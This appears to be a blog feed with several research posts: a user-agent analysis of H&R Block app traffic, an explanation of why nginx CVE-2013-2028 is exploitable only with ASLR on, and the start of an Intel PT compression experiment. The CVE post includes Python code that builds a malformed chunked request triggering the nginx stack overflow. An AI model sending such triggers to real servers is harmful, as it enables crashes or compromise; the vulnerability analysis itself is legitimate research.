<span class="sd"> &quot;&quot;&quot;</span>
<span class="k">if</span> <span class="n">line</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="n">year</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">if</span> <span class="n">line</span><span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;HRB&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">if</span> <span class="nb">filter</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span> <span class="ow">and</span> <span class="nb">filter</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">return</span> <span class="bp">True</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">&#39;__main__&#39;</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;Usage:&#39;</span><span class="p">,</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s1">&#39;&lt;tax-year&gt;&#39;</span><span class="p">,</span> <span class="s1">&#39;&lt;filter&gt;&#39;</span><span class="p">,</span> <span class="s1">&#39;&lt;filepath&gt;&#39;</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="nb">filter</span> <span class="o">=</span> <span class="bp">None</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">filter</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="s1">&#39;r&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">ifile</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="n">line</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">ifile</span> <span class="k">if</span> <span class="n">is_hrb</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">)]</span>
<span class="n">buckets</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">&#39;OS&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;IOS&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">&#39;ANDROID&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">&#39;DEVICE&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;PHONE&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">&#39;TABLET&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">&#39;APP&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;MYBLOCK&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">&#39;AUTH&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;TOUCHID&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">&#39;FACEID&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">&#39;N/A&#39;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">&#39;VERSION&#39;</span><span class="p">:</span> <span class="p">{},</span>
<span class="s1">&#39;BROWSER&#39;</span><span class="p">:</span> <span class="p">{},</span>
<span class="p">}</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
<span class="n">tokens</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;,&#39;</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;WARNING: Cannot tokenize:&#39;</span><span class="p">,</span> <span class="n">line</span>
<span class="k">continue</span>
<span class="n">subtokens</span> <span class="o">=</span> <span class="n">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;-&#39;</span><span class="p">))</span>
<span class="k">if</span> <span class="n">subtokens</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;WARNING: Cannot subtokenize:&#39;</span><span class="p">,</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;-&#39;</span><span class="p">)</span>
<span class="k">continue</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">count</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
<span class="k">except</span> <span class="ne">ValueError</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;WARNING: Could not parse count from:&#39;</span><span class="p">,</span> <span class="n">line</span>
<span class="k">continue</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;OS&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;OS&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;DEVICE&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;DEVICE&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;APP&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;APP&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
<span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
<span class="k">print</span> <span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">buckets</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">4</span><span class="p">)</span>
</pre></div>
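<p>For context, the slicing in <code>is_hrb</code> assumes each input line has a fixed layout: a <code>YYYY-MM-DD</code> date, a comma, the user-agent starting at character 11, and a trailing request count. Here's a quick sketch using a hypothetical line (the date and count are made up for illustration):</p>

```python
# Hypothetical input line in the layout the script's slicing assumes:
# a YYYY-MM-DD date (chars 0-9), a comma, the user-agent (from char 11),
# and a trailing request count.
line = "2018-01-07,HRB-MOBILE-IOS-PHONE-MYBLOCK-TOUCHID-6.1.0-Mozilla,42"

year = line[:4]                   # '2018' -> compared against the tax year
vendor = line[11:14]              # 'HRB'  -> quick H&R Block UA check
count = int(line.split(",")[-1])  # 42     -> number of requests observed
```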
<h2>Results</h2>
<p>So here's what I uncovered, listed in no particular order:</p>
<ul>
<li>From January 7 through February 8, <strong>232,248</strong> requests were made by MyBlock
apps.</li>
<li><strong>230,226</strong> requests were made from phones while <strong>2,022</strong> were tablets; over
<strong>99%</strong> of the requests were phones.</li>
<li><strong>0</strong> requests were made by Android tablets.</li>
<li>Over <strong>99%</strong> of requests were made by devices running iOS.</li>
<li>Two versions of the app appear in the dataset: <strong>6.0.0</strong> and <strong>6.1.0</strong>.</li>
<li>Version 6.1.0 makes up over <strong>99%</strong> of the requests.</li>
<li>The first requests made by version 6.1.0 occurred on January 13; <strong>6</strong> days
after the first 6.0.0 request.</li>
<li><strong>100%</strong> of requests from Android devices were version 6.1.0.</li>
<li>The requests made from Android devices contain no information about
authentication method or browser.</li>
<li><strong>100%</strong> of requests from iOS contain "Mozilla" in the user-agent.</li>
</ul>
<p>And finally, the observations relevant to my question:</p>
<ul>
<li><strong>170,816</strong> requests used TouchID, <strong>15,323</strong> FaceID,
and <strong>45,867</strong> showed neither keyword;
<strong>74%</strong>, <strong>7%</strong>, and <strong>19%</strong>, respectively.</li>
<li><strong>0%</strong> of requests for version 6.0.0 on iOS used FaceID.</li>
</ul>
<h2>Discussion</h2>
<p>For the requests from iOS devices that didn't mention an authentication method
in their user-agent, I assume the user typed a password or PIN, though I
haven't confirmed this. I also haven't looked into why all the iOS requests have
"Mozilla" at the end of their user-agent. It's probably related to the browser
framework used by the MyBlock app.</p>
<p>Judging by the fact that no requests from version 6.0.0 of the app used FaceID,
it's possible that this feature wasn't implemented until 6.1.0, though this is
just speculation.</p>
<p>Most interestingly, users appear comfortable using Apple's TouchID to
protect their MyBlock app. Even more striking is their willingness to use
FaceID, considering how new that feature is. In mobile computing, biometric
authentication appears to be a widely accepted trend.</p>
<p>It's also worth mentioning that while MyBlock doesn't appear to have been available during
the 2017 tax season, another H&amp;R Block app does appear:</p>
<div class="highlight"><pre><span></span>HRB-MOBILE-IOS-PHONE-TAXES-6.4-Mozilla
</pre></div>
<p>This app seems to have two versions, 6.4 and 6.3, but the total number of
requests is very low; only a few thousand. Another interesting finding is
<strong>13</strong> requests made on April 26, 2017 with this user-agent:</p>
<div class="highlight"><pre><span></span>HRB-MOBILE-IOS-PHONE-TAXES-nil-Mozilla
</pre></div>
<p>Perhaps this was a test version of the app?</p>
<h2>Future Work</h2>
<p>We still have two months to go in this year's tax season, so I'll be interested
to check the numbers once the season closes. I'm also curious to see how
many people continue to use this app outside of tax season and how these
results will change in 2019.</p>How ASLR Helps Enable Exploits (CVE-2013-2028)2017-12-16T11:30:00-05:002017-12-16T11:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-12-16:/aslr-enables-exploit.html<p>The other day I was playing around with <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2028">CVE-2013-2028</a>
along with my peer <a href="https://www.cc.gatech.edu/~hhu86/">Hong Hu</a> when we came across
something odd: <em>CVE-2013-2028 is only exploitable on 64-bit GNU/Linux when ASLR is <strong>enabled</strong></em>.
After confirming this observation multiple times, we were left very surprised.
How could ASLR possibly <em>worsen</em> the …</p><p>The other day I was playing around with <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2028">CVE-2013-2028</a>
along with my peer <a href="https://www.cc.gatech.edu/~hhu86/">Hong Hu</a> when we came across
something odd: <em>CVE-2013-2028 is only exploitable on 64-bit GNU/Linux when ASLR is <strong>enabled</strong></em>.
After confirming this observation multiple times, we were left very surprised.
How could ASLR possibly <em>worsen</em> the security of an application? Driven by
curiosity, we decided to find the root cause of this result. Ultimately, we
had to go all the way to the Linux kernel code to find our answer. What we
found was a kernel quirk that can't really be called a bug from the kernel's
perspective, but does go against the expectations of the user.
So without further ado, allow
me to share how ASLR can enable the exploitation of applications.</p>
<p>For those unfamiliar with CVE-2013-2028, all that needs to be known is it's an
exploitable vulnerability in older versions of nginx stemming from a stack
buffer overflow that can be triggered by specially crafted HTTP requests.
The bug occurs because an integer the user provides to nginx, intended to be
an unsigned value, is temporarily cast to a signed type.
If an attacker passes a sufficiently large value, the worker thread handling the
request will copy too much data from its network socket into a fixed-size buffer,
smashing the stack.
For the curious reader, a more in-depth analysis is available
<a href="https://www.vnsecurity.net/research/2013/05/21/analysis-of-nginx-cve-2013-2028.html">here</a>
and a repository for reproducing it is available
<a href="https://github.com/kitctf/nginxpwn">here</a>.</p>
<p>So why is this bug only exploitable when ASLR is turned on? We can find the
user space answer with a simple <code>strace</code>. If we make a chunked HTTP request and
claim the total size is going to be <code>0xaaaaaaaaaaaaaaaa</code>, nginx's worker will
make a <code>recvfrom()</code> system call for <code>0xaaaaaaaaaaaaaab0</code> bytes from the network
socket. When ASLR is turned on, the Linux kernel will copy our request (which is
not actually <code>0xaaaaaaaaaaaaaaaa</code> bytes long) into the worker's buffer, smashing
the stack. However, when ASLR is turned off, the kernel will return <code>-EFAULT</code> and
the worker will safely report the error and close the session.</p>
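<p>For reference, the trigger is simply a chunked transfer-encoding request whose chunk-size line lies about its length. Here's a hedged sketch of what such a request looks like on the wire; the host and path are placeholders, the snippet only builds the bytes without sending them, and it should never be aimed at a server you don't own:</p>

```python
def build_chunked_trigger(host="127.0.0.1", path="/"):
    """Build (but do not send) a chunked request whose chunk-size line
    claims 0xaaaaaaaaaaaaaaaa bytes. Host and path are placeholders."""
    header = ("GET %s HTTP/1.1\r\n"
              "Host: %s\r\n"
              "Transfer-Encoding: chunked\r\n"
              "\r\n" % (path, host))
    # The chunk-size line is hex digits followed by CRLF. The data actually
    # sent is far shorter than the size the line claims.
    body = "aaaaaaaaaaaaaaaa\r\n" + "A" * 4096
    return (header + body).encode()

req = build_chunked_trigger()
```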
<p>We could stop here, but Hong and I were not satisfied. Why is the kernel returning
<code>-EFAULT</code> when ASLR is disabled but not when it is enabled? The space allocated for
the stack is the same in both cases, so that can't be the problem. The only obvious
difference is ASLR moves the stack's address range to randomize it. When ASLR
is disabled, the stack's highest address is placed at the boundary between user and
kernel space, which is <code>0x7fffffffffff</code> in Linux kernels compiled for <code>x86_64</code>. However,
<code>0xaaaaaaaaaaaaaab0</code> is such a large number it shouldn't matter where the stack is
placed. It's not going to fit into the memory segment and it's going to cross the
boundary. So what's really happening in the kernel when it handles a <code>recvfrom()</code>
system call?</p>
<p>Taking a look at Linux's
<a href="http://elixir.free-electrons.com/linux/v4.9-rc4/source/net/socket.c#L1665">implementation</a>
of <code>recvfrom()</code>, we see the following code:</p>
<div class="highlight"><pre><span></span><span class="n">SYSCALL_DEFINE6</span><span class="p">(</span><span class="n">recvfrom</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">ubuf</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span>
<span class="kt">unsigned</span> <span class="kt">int</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">addr_len</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">socket</span> <span class="o">*</span><span class="n">sock</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">iovec</span> <span class="n">iov</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">msghdr</span> <span class="n">msg</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_storage</span> <span class="n">address</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">err</span><span class="p">,</span> <span class="n">err2</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">fput_needed</span><span class="p">;</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">import_single_range</span><span class="p">(</span><span class="n">READ</span><span class="p">,</span> <span class="n">ubuf</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">iov</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iter</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">sockfd_lookup_light</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">err</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">fput_needed</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">sock</span><span class="p">)</span>
<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_control</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_controllen</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="cm">/* Save some cycles and don&#39;t copy the address if not needed */</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_name</span> <span class="o">=</span> <span class="n">addr</span> <span class="o">?</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="nl">address</span> <span class="p">:</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="cm">/* We assume all kernel code knows the size of sockaddr_storage */</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_iocb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sock</span><span class="o">-&gt;</span><span class="n">file</span><span class="o">-&gt;</span><span class="n">f_flags</span> <span class="o">&amp;</span> <span class="n">O_NONBLOCK</span><span class="p">)</span>
<span class="n">flags</span> <span class="o">|=</span> <span class="n">MSG_DONTWAIT</span><span class="p">;</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">sock_recvmsg</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">addr</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
<span class="n">err2</span> <span class="o">=</span> <span class="n">move_addr_to_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">address</span><span class="p">,</span>
<span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">addr_len</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">err2</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">err2</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fput_light</span><span class="p">(</span><span class="n">sock</span><span class="o">-&gt;</span><span class="n">file</span><span class="p">,</span> <span class="n">fput_needed</span><span class="p">);</span>
<span class="nl">out</span><span class="p">:</span>
<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
<p>This code performs two relevant checks. The first occurs in:</p>
<div class="highlight"><pre><span></span><span class="n">err</span> <span class="o">=</span> <span class="n">import_single_range</span><span class="p">(</span><span class="n">READ</span><span class="p">,</span> <span class="n">ubuf</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">iov</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iter</span><span class="p">);</span>
</pre></div>
<p>And the second occurs in:</p>
<div class="highlight"><pre><span></span><span class="n">err2</span> <span class="o">=</span> <span class="n">move_addr_to_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">address</span><span class="p">,</span> <span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">addr_len</span><span class="p">);</span>
</pre></div>
<p>However, we can rule out <code>move_addr_to_user()</code> because it's passed
the number of bytes <em>actually</em> fetched from the socket, which is the same in
our attack regardless of ASLR. This leaves <code>import_single_range()</code>, which is
<a href="http://elixir.free-electrons.com/linux/v4.9-rc4/source/lib/iov_iter.c#L1207">implemented</a>
as follows:</p>
<div class="highlight"><pre><span></span><span class="kt">int</span> <span class="nf">import_single_range</span><span class="p">(</span><span class="kt">int</span> <span class="n">rw</span><span class="p">,</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">iovec</span> <span class="o">*</span><span class="n">iov</span><span class="p">,</span> <span class="k">struct</span> <span class="n">iov_iter</span> <span class="o">*</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&gt;</span> <span class="n">MAX_RW_COUNT</span><span class="p">)</span>
<span class="n">len</span> <span class="o">=</span> <span class="n">MAX_RW_COUNT</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">access_ok</span><span class="p">(</span><span class="o">!</span><span class="n">rw</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">len</span><span class="p">)))</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
<span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span> <span class="o">=</span> <span class="n">buf</span><span class="p">;</span>
<span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_len</span> <span class="o">=</span> <span class="n">len</span><span class="p">;</span>
<span class="n">iov_iter_init</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">rw</span><span class="p">,</span> <span class="n">iov</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">EXPORT_SYMBOL</span><span class="p">(</span><span class="n">import_single_range</span><span class="p">);</span>
</pre></div>
<p>In this function, a sanity check is performed via <code>access_ok()</code> to make sure
the number of bytes requested by the caller cannot cause a write that would
cross into kernel space. But as we pointed out before, the value nginx's worker
is passing here is <code>0xaaaaaaaaaaaaaab0</code>, which should easily cross the boundary
regardless of ASLR. The type <code>size_t</code> is defined as an unsigned 64-bit integer
in our case, so <code>access_ok()</code> should be passed <code>0xaaaaaaaaaaaaaab0</code>, right?
Actually, if we look more closely, we can see the following lines enforce a
limit on <code>len</code>:</p>
<div class="highlight"><pre><span></span><span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&gt;</span> <span class="n">MAX_RW_COUNT</span><span class="p">)</span>
<span class="n">len</span> <span class="o">=</span> <span class="n">MAX_RW_COUNT</span><span class="p">;</span>
</pre></div>
<p>If we look up <code>MAX_RW_COUNT</code>, we can see it equals <code>(INT_MAX &amp; PAGE_MASK)</code>,
which is a 32-bit value. In other words, even though <code>recvfrom()</code>
accepts 64-bit unsigned integer lengths on <code>x86_64</code>, <code>import_single_range()</code>
silently clamps them down to a 32-bit maximum! On a 64-bit processor, this clamping
combined with ASLR's relocation of the stack allows our attack to pass the
<code>access_ok()</code> check and smash nginx's stack.</p>
<p>Technically, this isn't a bug from the
kernel's perspective because <code>import_single_range()</code> also calls <code>iov_iter_init()</code>
with the clamped length. This means <code>recvfrom()</code> can only receive up to the clamped
length worth of bytes from the socket, and therefore passing the clamped value to
<code>access_ok()</code> is safe.</p>
<p>That said, it's an odd way to implement this system call. From the caller's
perspective, it isn't made clear that although a 64-bit length can be passed,
only lengths up to <code>MAX_RW_COUNT</code> will be honored. <code>recvfrom()</code> also treats
the length as 64 bits all the way through its logic, so it isn't immediately
obvious that the length is being capped at <code>MAX_RW_COUNT</code>. Additionally, as
Hong and I discovered, this choice has a security consequence. Performing the
<code>access_ok()</code> check on the clamped length allows network attacks that rely on
integer overflow or underflow to succeed where the kernel would otherwise likely
block them by failing the system call. We find this an interesting consequence
because it arises from seemingly unrelated design decisions. It is hard to
recommend that the Linux kernel developers revise <code>import_single_range()</code>
given that the real problem is a bug in nginx and not the Linux kernel itself,
but we find this
discovery fascinating regardless.</p>Intel PT Data at Rest: A Compression Experiment2017-10-28T10:30:00-04:002017-10-28T10:30:00-04:00Carter Yagemanntag:carteryagemann.com,2017-10-28:/pt-data-at-rest.html<p><em>Full Disclosure: I am a researcher in Georgia Tech's
<a href="http://istc-arsa.iisp.gatech.edu">ISTC-ARSA</a>, which is funded by
Intel. Although I reference two publications that share Xinyang Ge and Weidong Cui as
authors, I am neither associated with them nor Microsoft Research at the time
of writing.</em></p>
<p>Intel Processor Trace (PT) is a powerful …</p><p><em>Full Disclosure: I am a researcher in Georgia Tech's
<a href="http://istc-arsa.iisp.gatech.edu">ISTC-ARSA</a>, which is funded by
Intel. Although I reference two publications that share Xinyang Ge and Weidong Cui as
authors, I am neither associated with them nor Microsoft Research at the time
of writing.</em></p>
<p>Intel Processor Trace (PT) is a powerful hardware feature for recording the
behavior of CPUs. With it, developers and researchers can monitor the
control-flow path taken by threads, hardware interrupts, and more, all with
cycle-accurate timing. However, this rich stream of data comes at the cost of
size. Depending on what PT is configured to trace, it can output <em>hundreds of
megabytes</em> of data <em>per second per core</em>. PT does take steps to save bandwidth by
only recording changes in control-flow, excluding redundant high-order bits
in target addresses, and compressing returns leading to predictable locations. However,
despite this compression, the volume of data is still massive.</p>
<p>As a consequence, much of the work
published so far handles tracing in one of two ways. One option is to consume the
trace as it is generated. This works as long as the consumer can keep up with the
producer, which is the case in the control-flow integrity (CFI) system
<a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Griffin</a>.
The other common approach is to configure PT to write in a circular
buffer. This option is suitable for crash dump analysis systems like
<a href="https://dl.acm.org/authorize?N47279">Snorlax</a>, which only need a fixed size
window into a thread's past.</p>
<p>However, while some applications are feasible using the two previous methods,
there are still situations where it is desirable to store the entire trace for
postmortem analysis. If nothing else, it is useful for repeatable experiments.
With this in mind, I performed a naive experiment last night to explore if
more can be done to compress PT traces when <em>the data is at rest</em>. Based on the
observations that the compression PT applies is highly localized (i.e. a target
address versus the previously recorded target address and a return versus the
previously recorded call) and that programs often execute repetitive loops,
I hypothesized that even a general purpose compression algorithm should
be able to compress traces with a good ratio.</p>
<h2>Procedure</h2>
<p>The overall idea for the experiment is very simple: gather some PT traces,
compress them with a commonly used algorithm, and compare the sizes.
For a subject I used the simple HTTP server that comes with Python 2.7 to host
a copy of this blog. For each trial I had a crawler request pages from the
server for a set duration. Once the time expired, I terminated the server and
crawler and stopped the tracing. I then compressed the trace using the GNU/Linux
utility <code>gzip</code>, which uses DEFLATE (LZ77 combined with Huffman coding). I also fed it through a
disassembler that matches the PT packets to the binary's static code to
produce a linear sequence of instructions. From this I counted the number of
unique basic blocks executed during the trace to serve as a rough proxy for code
coverage. To summarize the procedure:</p>
<ol>
<li>
<p>Configure and enable PT tracing.</p>
</li>
<li>
<p>Start the Python HTTP server.</p>
</li>
<li>
<p>Start the crawler.</p>
</li>
<li>
<p>Wait for a specified duration.</p>
</li>
<li>
<p>Terminate the crawler and server.</p>
</li>
<li>
<p>Stop PT tracing.</p>
</li>
<li>
<p>Compress the resulting trace and count the number of unique basic blocks executed.</p>
</li>
</ol>
<h2>Results</h2>
<p><center>
<img alt="Figure 1" src="https://carteryagemann.com/images/pt-at-rest-fig1.png">
</center></p>
<p>Comparing the original size of the PT trace to the size after compression
produces the above graph. Both plots best match linear regressions and are
increasing over time. However, the size of the compressed traces increases
